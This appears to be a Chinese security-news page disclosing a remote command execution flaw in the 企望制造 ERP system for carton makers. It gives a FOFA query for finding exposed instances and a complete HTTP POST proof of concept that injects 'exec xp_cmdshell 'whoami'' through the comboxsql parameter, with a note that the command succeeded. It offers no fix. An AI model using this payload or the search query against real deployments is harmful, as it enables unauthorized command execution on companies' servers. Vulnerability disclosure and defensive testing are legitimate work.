当前位置: 首页 > news >正文

企望制造ERP系统存在RCE漏洞

漏洞描述

企望制造纸箱业erp系统由深知纸箱行业特点和业务流程的多位IT专家打造,具有国际先进的管理方式,将现代化的管理方式融入erp软件中,让企业分分钟就拥有科学的管理经验。erp的功能包括成本核算、报价定价、订单下达、生产下单、现场管理等多种功能。

漏洞复现

FOFA

title="企望制造ERP系统"

POC

POST /mainFunctions/comboxstore.action HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: JSESSIONID=11E0339EEFC982D1B2E80005DD204F4F
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 39comboxsql=exec%20xp_cmdshell%20'whoami'

bp 成功执行命令


http://www.mrgr.cn/news/40361.html

相关文章:

  • 架构师知识梳理(12):知识产权
  • [贪心 + dp] 疯狂的火神
  • 模型推理实践与工具详解
  • 数据库 - Mongo数据库
  • 付费计量系统通用功能(5)
  • 【拥抱AIGC】通义灵码扩展管理
  • 软件架构设计师教程 第15章 15.3 SOA的参考架构 笔记
  • 网络编程套接字TCP
  • 开源模型应用落地-模型微调-语料采集-数据标注(二)
  • Python - 正则判断/获取 markdown 图表、图片链接 元素
  • 成都大学体育场馆预约系统—计算机毕业设计源码37087
  • 初学51单片机之I2C总线与E2PROM二
  • win11任务栏颜色怎么修改?透明任务栏效果可以实现吗?5套方案!
  • 解锁数据宝藏:AI驱动搜索工具,让非结构化数据“说话
  • 智能招聘系统小程序的设计
  • 华为OD机试 - 超级玛丽通过吊桥的走法 - 动态规划(Python/JS/C/C++ 2024 E卷 200分)
  • 搭建Jmeter分布式压测与监控,轻松实践
  • Linux网络操作命令与函数全面总结
  • 【老生常谈、查漏补缺】SpringBoot接收参数的几种方式图文详解
  • PCL 点云索引提取器